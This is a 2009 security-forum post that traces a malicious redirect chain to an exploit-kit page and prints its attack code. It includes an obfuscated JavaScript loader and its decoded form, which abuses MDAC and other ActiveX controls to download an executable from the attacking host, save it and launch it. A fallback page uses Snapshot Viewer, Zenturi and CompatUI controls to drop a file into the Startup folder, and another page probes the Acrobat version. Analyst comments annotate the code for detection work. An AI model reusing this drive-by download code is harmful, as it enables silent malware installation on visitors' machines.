Author Topic: drabland.net > xdsabc.info > xisaba.info > exploit  (Read 3429 times)


June 10, 2009, 08:04:38 pm

MysteryFCM

Starts at:

drabland.net/lite (IP: 211.95.78.79)

Which leads to:

http://www.xdsabc.info/tds/go.php?sid=1  (IP: 211.95.78.79)

Which redirects (via HTTP 302) to:

http://www.xisaba.info/cj/  (IP: 211.95.78.79)

<script Language="javascript" type="text/javascript">try {var myfunc=parseInt; var i_2=2; var Fi='ttEtiEt3EtdEthEtJEtbEtjEtAEtGEtYEtnEtmEtfEtCEtREtMEtsEt8EtPEtLEtZEtrEtzEtgEtcEtwEteEtaEtkEt4EtxEtoEtKEtWEtNEtBEtIEt5EtSEtTEtXEt6EtHEtFEtUEtDEtyEtOEt7EtqEtVEtlEtpEitEiiEi3EidEihEiJEibEijEiAEiGEiYEinEimEifEiCEiREiMEisEi8EiPEiLEiZEirEizEigEicEiwEieEiaEikEi4';var tf=Fi.substr(2,1);var MHX=Array(149,ync('137'),ync('253'),ync('225'),ync('248'),249,ync('139'),55295^55111,23708^23587,34054^34294,ync('244'),13967^13950,60424^60660,ync('208'),ync('216'),ync('218'),9087^9146,12212^12128,210,56145^56267,43139^43124,37408^37594,ync('236'),ync('198'),193,ync('204'),45839^46038,57053^56917,9902^9785,ync('209'),220,143,14253^14198,ync('227'),ync('231'),ync('234'),ync('221'),194,ync('155'),205,15759^15704,ync('211'),18889^18719,223,ync('138'),15454^15544,ync('246'),ync('229'),ync('192'),ync('195'),199,ync('157'),2114^2267,8691^8559,54593^54671,ync('142'),38164^38288,ync('146'),ync('135'),ync('134'),ync('200'),ync('148'),ync('242'),ync('255'),ync('243'),ync('251'),ync('133'),ync('233'),ync('226'),39980^40130,ync('232'),ync('158'),3483^3397,8105^7972,ync('159'),ync('128'),ync('131'),10010^10231,51695^51499,16338^16194,8034^8160,ync('129'),ync('140'),ync('224'),ync('152')),lGg;var 
gpv,Qng,boJ='tttit3tdthtJtbtjtAtit3tGtYtntbtjtAtitdtmtdtJtGtbtntftCtRtttMtst8tftitPtdtmtdtJtGtbtjtAtitPt3tGtYtntbtjtAtitLtZtntrtttztgtctwtftetatkt4tztMtwtstctxtotRtotftatbtjtAtjtAtitntmtKttt4tktetatWtftCtRtgtftNt3tRtztgtatbtBtgtgtMtxtPtPtItItIt5tSt4tztstTtst5t4totXtRtPt6tHtPt8tftgt5tMtBtMtFtRtMtgtetwtRtstktitPtntmtKtbtjtAtjtAtitUtDtWtmtytdtttJtstot8tOtst8tftetatHtst7tstzt6tqt4tMtgtatttgtctMtftetatgtftStgtPtHtst7tstzt6tqt4tMtgtatbtjtAtjtAtjtAtXtOtot6tgt4tRtotttDtqtftstgtftZtVtRtltttotpttittjtAt7tstqtttqtttetttotOtwtwiitjtAtft6tRtktftNi3tttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotpidiitjtAtft6tRtktftNihtttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotltttatatpidiitjtAtft6tRtktftNiJtttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotltttatatltttatatpidiitjtAtjtAtgtqtcttittttft7tstwtVtft6tRtktftNi3tpttibt6tstgt6tBtVtftpitibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVtft6tRtktftNihtpttibt6tstgt6tBtVtftpitibtjtAibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVtft6tRtktftNiJtpttibt6tstgt6tBtVtftpitibtjtAibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtatatltttotpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtotltttatatpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtotpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtqtftgtOtqtotVtqtpiitttttttttttttjtAibtjtAtjtAtXtOtot6tgt4tRtottiAtRtVtstpttittjtAtjtAt7tstqtttztYtMtMtttttttetttatUtBtftwtwt5tYtMtMtwt4t6tstgt4tRtotaiitjtAt7tstqtttztYtntZtttttttetttatYtntZtntLt5tUtgtqtftstCtaiitjtAt7tstqtttRtYtMtMtttttttetttDtqtftstgtftZtVtstltttztYtMtMtttpiitjtAt7tstqtttRtYtntZtttttttetttDtqtftstgtftZtVtstltttztYtntZtttpiitjtAt7tstqtttRtUtDtttttttttetttDtqtftstgtftZtVtstltttathtUtUt6tqt4tMtgtDtRtotgtqtRtwt5tUt6tqt4tMtgtDtRtotgtqtRtwtatpiitjtAtjtAtRtUtDt5tJtstot8tOtst8tftetaiGtst7tstUt6tqt4tMtgtaiitttttjtAtRtUtDt5tWtftztftgtVtpiitjtAtjtAt7tstqtttRiYtRtwtkt
ftqtttetttRtYtMtMt5intstCtftUtMtst6tftVihimtpiitjtAt7tstqtttRiYtRtwtktftqtmtgtftCtetRiYtRtwtktftqt5tytstqtztfintstCtftVtatUtctCtTtRtwt5tgtgtXtatpiitjtAiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtztetRiYtRtwtktftqtmtgtftCt5tytstgtBt5tztMtwt4tgtVtaififtatpiitjtAiCt4totnt4tqtettiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtziRimiMttistttaififtattisttiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtziRi3iMttistttaififtaiitjtAtGtStfintstCtftetataiitjtAtjtAtXtRtqtttVt4i8teimiit4i8tiiPiit4i8isistptjtAittjtAttttttttttt4t4tethtstgtBt5tqtstotktRtCtVtpiitjtAttttttttttt6tBtDtRtktftethtstgtBt5tqtRtOtotktVt4t4iLihiZtpisimtSiri3iitjtAttttttttttt6tBtUtctCtetUtgtqt4tot8t5tXtqtRtCtDtBtstqtDtRtktftVt6tBtDtRtktftptjtAtttttttttttGtStfintstCtftetGtStfintstCtfist6tBtUtctCiitjtAttttttttttt4tXtttVt6tBtDtRtktfteteimtSiri3tpttittTtqtftsi8ibiitjtAibtjtAtjtAtGtStfintstCtfteiCt4totnt4tqttistttGtStfintstCtfttistttat5tftaistatStaistatftaiitjtAtGtStfintstCtftetGtStfintstCtft5tqtftMtwtst6tftVtPififtPt8tltaififififififififtatpiitjtAtjtAt7tstqtttktstgiitttjtAt7tstqtttOtqtwtttetttWtftCtRtgtftNt3tRtztgt5t4tototftqtdtftStgiitjtAt7tstqtttStCtwtttetttotOtwtwiitjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttatht4t6tqtRtztRtXtgt5izthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttathtUizthtJiht5izthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttathtUizthtJiht5tUtftqt7tftqizthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiiiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtetotftIttizthtJt3tgtgtMtWtfigtOtftztgtVtpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtqtftgtOtqtottiYtYtJtUtGiitjtAibtjtAibtjtAibtjtAibtjtAtStCtwt5tztftotktVtotOtwtwtpiitjtAtjtAtzt3tftstktDtRtktftNi3tttetttaiciwiriciri3iciwihicihimiciZiPi
cieihiciJtniciriYiciZiPiciZiJicihtGiciwihiciriZiciwiJtaiitjtAtRtUtDt5tYtktktZtTtHtft6tgtVtatRiztUtatltttStCtwtpiitjtAtzt3tftstktDtRtktftNihtttetttaiciwimiciriYicirtGiciwiJiciriZicieihiciriYicirieiciwiaiciJtLiciriYiciei3iciZiJicihtGiciZieiciwiaiciwimiciriZiciJtniciJi3iciJtLtaiitjtAtzt3tftstktDtRtktftNiJtttetttaiciriYiciei3iciZiJicihtGicietniciriYicirieiciriZiciJtniciJiJiciJtLiciriYiciei3iciZiJicihtGicieiYiciwimiciriZicirtGtaiitjtAtRtUtDt5tYtktktZtTtHtft6tgtVtatRtYtUtatltttRtYtntZtpiitjtAtzt3tftstktDtRtktftNietttetttaicihiPicihiaiciJtLiciriYiciei3iciZiJicihtGiciZiwiciwihiciriaiciwieiciriZicihiPiciZiPicieihicihiaiciJtLiciriYiciei3iciZiJicihtGtaiitjtAtzt3tftstktDtRtktftNiZtttetttaiciZiJiciri3iciwiriciriZiciZieiciriYicieiriciriaicirtDiciriZicihiPicihiwtaiitjtAtjtAtzt3tftstktDtRtktftetOtotftzt6tstMtftVtzt3tftstktDtRtktftNi3istzt3tftstktDtRtktftNihistzt3tftstktDtRtktftNiJistzt3tftstktDtRtktftNieistzt3tftstktDtRtktftNiZtpiitjtAtziYtOtwtwtDtRtktftetzt3tftstktDtRtktfistGtStfintstCtfistaidtlihtpiitaiitjtAtRtUtDt5tGtStft6tOtgtftUtgtstgtftCtftotgtVtziYtOtwtwtDtRtktftpiitjtAtttjtAtztJtstOtot6tBtttettidtRtYtMtMt5tUtBtfidisidtwtwtGtSidisidtft6tOtgidisidtftVtGtSidisidtfintstCtftpidiitttjtAtft7tstwtVtztJtstOtot6tBtpiitjtAtjtAtqtftgtOtqtotttdtWiktGiitjtAtjtAibtjtAtjtAt7tstqttt4tttettimiitjtAt7tstqtttwtHtttetttataiitjtAt7tstqtttgtttetttotftItttYtqtqtstctVtaittaistwtHistatLtniataistwtHistairtDiZiZiri4iriZtYiJi4i3i3tntaistwtHistaimi4iaiPiJtYi4imimtDimieiYtDihiatGiJirtaistwtHistaibtatltaittLtniairtDiZtaistaiZiri4iriZtYiJtaistai4taistai3taistai3tntaistaimi4iaiPiJtYi4imtaistaimtDimieiYtDtaistaihtaistaiatGiJtaistairtatltaittYtLiatLtDtGtntni4tGtDiwtGi4taistaieiwtGi3i4taistaiaiJtaistaihihi4tnietYihi3imiri3iwi3i3iribtatltaittaistaimimimtaistairiYimiJiJi4imtaistaimimimi4imimimtaistaimtaistai4tDimtaistaimtaistaimtaistai4taistaimtaistaimtaistaimimimimimimimimtaistaieirtaistaibtatltaittaistaimtaistaimimiriYimtaistaiJtYtaistai4imimimtaistaimtaistai4imimimimtaistai4tDimimimi4imimimtaistaimtaistaimtai
staimtaistaimtaistaimimimtaistaietaistairtatltaittaistairtfiJihimiwimtsi4iwirtaistairtki4ietftfiri4iPiwiat6i4tkt6i3tXtaistatsiai3tkihtaistatXt6taistaiJtatltaitirietaistai3ieiZi3ihtLi4taistatLiaiwiPi4ieiZtaistai3tni4tYtaistaimtntaistaiPtaistai4taistaiYtDiYtniYiJiJtGiPtaistaiJtaistaiJtaistatDtaistaibtatltaittaistaiwiYiZtaistatLiwiYiriJi4iYtaistaimtaistairiYi4ieiJiJi3i4taistaiPtaistatYihiri4iJiJiatGtaistaimtaistaiJtDimtYtaistatGiJtntaistaibtatltaittaistaimiriwihiJtGimtaistaiai4iYietDtaistaihtaistai4ieiJtaistat6iPi4taistaiPtaistaiJtaistaiZtaistaiPi4imiaiYtDtaistatni3tntLimiwirtaistairtaistaibtatltaittaistairiJiataistaiYtaistaiwihiZiYi4taistai3taistatLtaistaihtni4ieiPiJtaistai3i4tYiaiYtntaistai4iPiwieiPietaistaiwtaistairiPihimi3taistaimtaistaibtatltaittLtYimi3iPiZiaiai4i3tntLtaistaiJi4ieietXiai4iPiJtLiei4ieirtaistai3ieiZietDiPietLiYiPibtatltaittaistatnimtDimiwtniZirtaistai4iwtDiriataistai4taistaieiJtaistaiYtaistai3taistai4taistatLtaistaietYimi4ihtaistaiZtaistaiYiZtYi3i3iYtYtaistatLtaistai3iataistaibtatltaittaistatGtaistaiPtaistatDtaistatDtaistatDtaistatntniYtaistai4taistatDtYihtaistaiPi4ieiairtaistatTtaistai4tLimiZimi4taistairtaistatDimtaistaiwtaistatDiairihieiwtaistairtaistatLibtatltotOtwtwtpiitjtAtjtAt7tstqttthtOtztgtGtStft6tOtgtftktei3iitjtAt7tstqttthtntYtDtNtWtOtototftkteimiitjtAtjtAt4tXtttVthtOtztgtGtStft6tOtgtftktetei3tpttittjtAtjtAtttttttItBt4twtftttVtgiRt4iMtpttittjtAttttttttttttttttttt7tstqtttstttetttotOtwtwiitjtAttttttttttttttttttt4tXtttVtgiRt4iMt5tztOtTtztgtqt4tot8tVimtli3tptttetettiditidtpttittjtAtttttttttttttttttttstttetttktRt6tOtCtftotgt5t6tqtftstgtftGtwtftCtftotgtVtatRtTtHtft6tgtatpiitjtAtttttttttttttttttttst5tztftgtYtgtgtqt4tTtOtgtftVtat6twtstztzt4tktatltttat6twtzt4tktxtattistttgiRt4iMt5tztOtTtztgtqt4tot8tVi3tltttgiRt4iMt5twtftot8tgtBtti4tti3tptpiitjtAttttttttttttttttttibtttftwtztfttittjtAtttttttttttttttttttgtqtcttittttstttetttotftItttYt6tgt4t7tfiztZtTtHtft6tgtVtgiRt4iMtpiittibttt6tstgt6tBtVtftpitibtjtAttttttttttttttttttibtjtAtjtAttttttttttttttttttt4tXttt
VtstpttittjtAtttttttttttttttttttttttttttttttgtqtcttittttttttttttttttttttttttjtAttttttttttttttttttttttttttttttttttt7tstqtttTtttetttDtqtftstgtftZtVtstltttatUtBtftwtwtaistat5taistatYtMtMtwt4t6tstgt4tRtotatpiitjtAttttttttttttttttttttttttttttttttttt4tXtttVtTtpttittjtAttttttttttttttttttttttttttttttttttttttttttttttttttthtntYtDtNtWtOtototftktei3iitttjtAttttttttttttttttttttttttttttttttttttttttttttttttttt4tXtttViAtRtVtstptptttTtqtftsi8iitjtAttttttttttttttttttttttttttttttttttibtjtAtjtAttttttttttttttttttttttttttttttibt6tstgt6tBtVtftpitibtjtAttttttttttttttttttibtjtAttttttttttttttttttt4isisiitjtAtjtAttttttibtjtAtjtAttttttt4tXtttVthtntYtDtNtWtOtototftkteteimtpttttittjtAtttttttttttttttIt4totktRtIt5twtRt6tstgt4tRtotetatBtgtgtMtxtPtPtItItIt5tSt4tztstTtst5t4totXtRtPt6tHtPtztotstMtztBtRtgt5tMtBtMtaiitjtAttttttibtttttjtAtttttttjtAibtjtAtjtAtitPtUtDtWtmtytdtbtjtAtitPtLtZtntrtbtjtAtitPt3tdthtJtbtjtA';var Cek=String();Fi=Fi.split(tf);for(lGg=0;lGg<boJ.length;lGg+=i_2){Qng=boJ.substr(lGg,i_2);for(gpv=0;gpv<Fi.length;gpv++){if(Fi[gpv]==Qng)break;} Cek+=String.fromCharCode(MHX[gpv]^181);}function ync(Ie){return myfunc(Ie)}document.write(Cek);}
catch(e){}</script>

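Decoded output of the script above (it splits boJ into two-character tokens, looks each one up in Fi, XORs the matching MHX entry with 181 and passes the resulting string to document.write):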
<HTML>
<HEAD>
<TITLE>Demo page</TITLE>
</HEAD>
<BODY style="display:none">

<DIV id="Remote_Host">http://www.xisaba.info/cj/get.php?opt=load</DIV>

<SCRIPT Language="javascript" type="text/javascript">


// NOTE(analysis): captured exploit-kit sample. The code is left exactly as captured;
// the comments are reviewer annotations written for detection and triage.
//
// CreateO(o, n): asks host object `o` for an instance of ProgID `n`. It tries three
// CreateObject call shapes and then three GetObject call shapes, stopping at the first
// one that yields a truthy result. Returns that object, or null when every attempt fails.
// Each call sits inside an eval() string with an empty catch, so the method names only
// appear inside string literals; content signatures have to match inside the quotes.
function CreateO(o, n) {
var r = null;
// Assigned without `var`, so these three strings become globals on the page.
ecode_1 = 'r = o.CreateObject(n)';
ecode_2 = 'r = o.CreateObject(n, "")';
ecode_3 = 'r = o.CreateObject(n, "", "")';

// CreateObject with one, two, then three arguments; failures are swallowed silently.
try { eval(ecode_1) }catch(e){}
if (! r) {
try { eval(ecode_2) }catch(e){}
}
if (! r) {
try { eval(ecode_3) }catch(e){}
}
// GetObject fallbacks, tried only while r is still empty.
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);     
}

// NOTE(analysis): captured exploit-kit sample. The code is left exactly as captured;
// the comments are reviewer annotations written for detection and triage.
//
// Go(a): download-and-run stage. Using host object `a` it obtains Shell.Application,
// ADODB.Stream and MSScriptControl.ScriptControl, fetches the URL held in the
// Remote_Host element, saves the response body to a randomly named .exe and launches it.
// Observable behaviour: the browser process issues a GET for get.php?opt=load, a new
// executable appears in the directory computed below, and the browser starts it.
function Go(a) {

var sApp   = "Shell.Application";
var sADO   = "ADODB.Stream";
var oApp   = CreateO(a, sApp );
var oADO   = CreateO(a, sADO );
var oSC    = CreateO(a, "MSScriptControl.ScriptControl");

oSC.Language="JavaScript"; 
oSC.Reset();

// NameSpace(20) is the Fonts special folder in the Shell's numbering (ssfFONTS).
// The first two components of Symbol.ttf's path are kept as the drop directory;
// presumably the drive plus the Windows directory, the page does not show the value.
var oFolder = oApp.NameSpace(20);
var oFolderItem=oFolder.ParseName("Symbol.ttf");
Font_Path_Components=oFolderItem.Path.split("\\");
WinDir= Font_Path_Components[0] + "\\" + Font_Path_Components[1] + "\\";
ExeName="";

// Random file name: 1 to 8 lowercase letters (0x61..0x7A). The loop stops early as soon
// as an 'a' (0x61) is produced, so any name shorter than 8 characters ends in 'a'.
for (ik=0;ik<8;ik++)
{
     ii=Math.random();
     chCode=Math.round(ii*25)+0x61;
     chSym=String.fromCharCode(chCode)
     ExeName=ExeName+chSym;
     if (chCode==0x61) {break};
}

// ".exe" is split into pieces so the literal does not appear in the page source.
ExeName=WinDir + ExeName + ".e"+"x"+"e";
// Every backslash becomes four; presumably so the path survives being parsed again as
// a quoted string inside the statement generated further down.
ExeName=ExeName.replace(/\\/g,"\\\\\\\\");

var dat;
// Remote_Host is the id of the DIV in this listing that holds the payload URL.
var url = Remote_Host.innerText;
var xml = null;
// HTTP client fallback chain, all synchronous GETs: Microsoft.XMLHTTP, then
// MSXML2.XMLHTTP, then MSXML2.ServerXMLHTTP, then the native XMLHttpRequest.
try
{
xml = CreateO(a, "Microsoft.XMLHTTP");
xml.open("GET", url, false);
}
catch(e)
{
try
{
xml = CreateO(a, "MSXML2.XMLHTTP");
xml.open("GET", url, false);
}
catch(e)
{
try
{
xml = CreateO(a, "MSXML2.ServerXMLHTTP");
xml.open("GET", url, false);;
}
catch(e)
{
try
{
xml=new XMLHttpRequest();
xml.open("GET", url, false);
}
catch(e)
{
// FALSE is not defined anywhere in this listing; unless the host defines it, this
// line throws a ReferenceError, which the caller's empty catch absorbs.
return FALSE;
}
}
}
}
xml.send(null);

// The five percent-encoded fragments are interleaved with AddObject calls and joined
// below. Decoded, the statement handed to the ScriptControl is:
//   var XB=oXS.responseBody;oAS.Type=1;oAS.Mode=3;oAS.Open();oAS.Write(XB);oAS.SaveToFile('<ExeName>',2);
// i.e. the response body is written through ADODB.Stream (Type 1 = binary) to ExeName,
// with SaveToFile option 2 (overwrite an existing file).
sHeadCode_1 = "%76%61%72%20%58%42%3D%6F%58%53%2E%72%65%73";
oSC.AddObject("oXS", xml);
sHeadCode_2 = "%70%6F%6E%73%65%42%6F%64%79%3B%6F%41%53%2E%54%79%70%65%3D%31%3B";
sHeadCode_3 = "%6F%41%53%2E%4D%6F%64%65%3D%33%3B%6F%41%53%2E%4F%70%65%6E";
oSC.AddObject("oAS", oADO);
sHeadCode_4 = "%28%29%3B%6F%41%53%2E%57%72%69%74%65%28%58%42%29%3B%6F%41%53%2E";
sHeadCode_5 = "%53%61%76%65%54%6F%46%69%6C%65%28%27";

sHeadCode=unescape(sHeadCode_1+sHeadCode_2+sHeadCode_3+sHeadCode_4+sHeadCode_5);
sFullCode=sHeadCode+ExeName+"',2);";
oSC.ExecuteStatement(sFullCode);
 
// The launch call is assembled from string pieces and run through eval, so the method
// name never appears as one token in the source: oApp.ShellExecute(ExeName).
sLaunch = 'oApp.She'+'llEx'+'ecut'+'e(Ex'+'eName)';
eval(sLaunch);

// TRUE is likewise undefined in this listing, so this return would throw after the file
// has already been launched. The caller's loop then moves on to the next class id
// instead of breaking, which may show up as repeated payload requests from one visit.
return TRUE;

}

// NOTE(analysis): captured exploit-kit sample. The code is left exactly as captured;
// the comments are reviewer annotations written for detection and triage.
//
// Driver: walks a list of class ids, creates an <object> element for each, and calls
// Go() on the first one through which Shell.Application can be obtained.
var i = 0;
var lj = "";
// The class ids are split into concatenated fragments (lj is an empty filler), so no
// complete CLSID appears literally in the page. Assembled, the entries are:
//   {BD96C556-65A3-11D0-983A-00C04FC29E36}   (RDS.DataSpace, part of MDAC)
//   {BD96C556-65A3-11D0-983A-00C04FC29E36    (no closing brace)
//   {AB9BCEDD-EC7E-47E1-9322-D4A210617116}
//   {0006F033-0000-0000-C000-000000000046}
//   {0006F03A-0000-0000-C000-000000000046    (no closing brace)
//   {6e32070a-766d-4ee6-879c-dc1fa91d2fc3    (no closing brace)
//   {6414512B-B978-451D-A0D8-FCFDF33E833C}
//   {7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
//   {06723E09-F4C2-43c8-8358-09FCD1DB0766}
//   {639F725F-1B2D-4831-A9FD-874847682010}
//   {BA018599-1DB3-44f9-83B4-461454C84BF8}
//   {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
//   {E8CCCDDF-CA28-496b-B050-6C07C962476B}
// The trailing null ends the while loop below.
var t = new Array("{"+lj+"BD9"+lj+"6C556-65A3-11D"+lj+"0-983A-00C04FC29E36"+lj+"}","{BD96C5"+"56-65A3"+"-"+"1"+"1D"+"0-983A-0"+"0C04FC"+"2"+"9E3"+"6","{AB9BCEDD-EC7E-"+"47E1-"+"93"+"22-D4A210617116}","{"+"000"+"6F033-0"+"000-000"+"0"+"-C0"+"0"+"0"+"-"+"0"+"0"+"00000000"+"46"+"}","{"+"0"+"006F0"+"3A"+"-000"+"0"+"-0000"+"-C000-000"+"0"+"0"+"0"+"0"+"000"+"4"+"6","{"+"6e32070a-76"+"6d-4ee6-879c-dc1f"+"a91d2"+"fc"+"3","{64"+"14512B-"+"B978-45"+"1D-A"+"0D"+"8"+"-"+"FCFDF33E8"+"3"+"3"+"C"+"}","{"+"7F5"+"B7F63-F"+"0"+"6F-4331-"+"8"+"A26-339E"+"0"+"3C0A"+"E3D"+"}","{"+"06723E0"+"9-F4C"+"2"+"-43"+"c8-"+"8"+"3"+"5"+"8-09FC"+"D1DB076"+"6"+"}","{"+"639"+"F"+"725F-"+"1"+"B"+"2D-483"+"1-A9FD"+"-87484"+"7"+"68201"+"0"+"}","{BA018599-1DB"+"3-44f9-83B4-46"+"1454C84BF8}","{"+"D0C07D56"+"-7C69"+"-"+"43"+"F"+"1"+"-"+"B"+"4A0-2"+"5"+"F5A11FA"+"B"+"19"+"}","{"+"E"+"8"+"C"+"C"+"C"+"DDF"+"-"+"CA2"+"8-496"+"b"+"-B050-"+"6"+"C0"+"7"+"C96247"+"6"+"B}",null);

var MustExecuted=1;
var MDAC_Runned=0;

if (MustExecuted==1) {

   while (t[i]) {
         var a = null;
         // Entries starting with '{' become <object classid="clsid:...">. The first and
         // last characters are stripped, so for the three entries without a closing
         // brace the last hex digit is dropped and the classid is one character short.
         if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
         } else {
         // ProgID path; no entry in the array above takes it.
         try { a = new ActiveXObject(t[i]); } catch(e){}
         }

         if (a) {
               try {           
                 // Probe: can this object hand out Shell.Application? If so, mark the
                 // attempt as made and run the download-and-run stage.
                 var b = CreateO(a, "Shell"+"."+"Application");
                 if (b) {
                         MDAC_Runned=1;
                         if (Go(a)) break;
                 }

               }catch(e){}
         }
         i++;

   }

   // No object yielded Shell.Application: the browser is redirected to the next stage,
   // snapshot.php on the same host.
   if (MDAC_Runned==0)  {
       window.location="http://www.xisaba.info/cj/snapshot.php";
   } 
   
}

</SCRIPT>
</BODY>
</HTML>

Files on this server:

/snapshot.php

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='oSnapViewer'></object>
<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='oZenturi'></object>
<script language='javascript'>
// NOTE(analysis): captured exploit-kit sample. The code is left exactly as captured;
// the comments are reviewer annotations written for detection and triage.
//
// Fallback stage. oSnapViewer and oZenturi are the ids of the two <object> tags that
// precede this script in the listing.
// EXE_URL is the same payload URL used by the previous stage.
var EXE_URL = 'http://www.xisaba.info/cj/get.php?opt=load';
// Decodes to C:/Documents and Settings/All Users/Start Menu/Programs/Startup/~tmp0002.exe,
// the All Users Startup folder, so a file written there would run at the next logon.
// A new ~tmp0002.exe in that folder is a host indicator for this stage.
var EXE_Local = unescape('C%3A/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup/~tmp0002.exe');

// Attempt 1: the oSnapViewer control is given the remote URL as SnapshotPath and the
// Startup path as CompressedPath, then PrintSnapshot() is called. The sample appears to
// rely on the control fetching the remote file and storing it at the local path.
try  {
oSnapViewer.Zoom = 0;
oSnapViewer.ShowNavigationButtons = false;
oSnapViewer.AllowContextMenu = false;
oSnapViewer.SnapshotPath = EXE_URL;
oSnapViewer.CompressedPath = EXE_Local;
oSnapViewer.PrintSnapshot();
} catch(e){}

// Forward slashes are rewritten to doubled backslashes before the launch attempts.
EXE_Local=EXE_Local.replace(/\//g,'\\\\');

// Attempt 2: hand the local path to the oZenturi control's NavigateUrl.
try  {
oZenturi.NavigateUrl(EXE_Local,"1","_SELF");
} catch(e){}

// Attempt 3: CompatUI.Util.RunApplication on the same path. Each attempt has an empty
// catch, so a failure leaves no visible error on the page.
try  {
var oUtil=new ActiveXObject("CompatUI.Util");
oUtil.RunApplication("",EXE_Local,0);
} catch(e){}

</script>
<iframe src='showdoc.php' width=10 height=10></iframe>
</html>

/showdoc.php?ap= [4-8] - {file}.pdf

<script language="Javascript" type="text/javascript">

          var acrobat=new Object();
          acrobat.installed=false;
          acrobat.version='0.0';
          acrobat.number=0;
          if (navigator.plugins && navigator.plugins.length) {
          for (x=0; x<navigator.plugins.length;x++) {
              if (navigator.plugins[x].description.indexOf('Adobe Acrobat')!= -1)
              {
                 acrobat.version=parseFloat(navigator.plugins[x].description.split('Version ')[1]);
                 acrobat.number=acrobat.version;
                 if (acrobat.version.toString().length == 1) acrobat.version+='.0';
                 acrobat.installed=true;
                 break;
              }
          }
          }
          else if (window.ActiveXObject) {
              for (x=2; x<10; x++) {
              try {
                  oAcro=eval("new ActiveXObject('PDF.PdfCtrl."+x+"');");
                  if (oAcro) {
                     acrobat.installed=true;
                     acrobat.version=x+'.0';
                     acrobat.number=x;
                  }
              } catch(e) {}
              }
   
              try {
              oAcro7=new ActiveXObject('AcroPDF.PDF.1');
              if (oAcro7) {
                 acrobat.installed=true;
                 versions = oAcro7.GetVersions().split(',');
                 version = versions[0].split('=');
                 version = version[1].split('.');
                 hversion = parseFloat(version[0]);
                 lversion = parseFloat(version[1]);
                 acrobat.number = hversion;   
                 acrobat.version= hversion+'.'+lversion;
              }
              } catch(e) {}
          }
          if (acrobat.installed==true) {
            document.write("<iframe src='showdoc.php?ap="+acrobat.number+"' width=5 height=5></iframe>");
          }
          </script>
         


/get.php?opt=load - exefile.exe
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net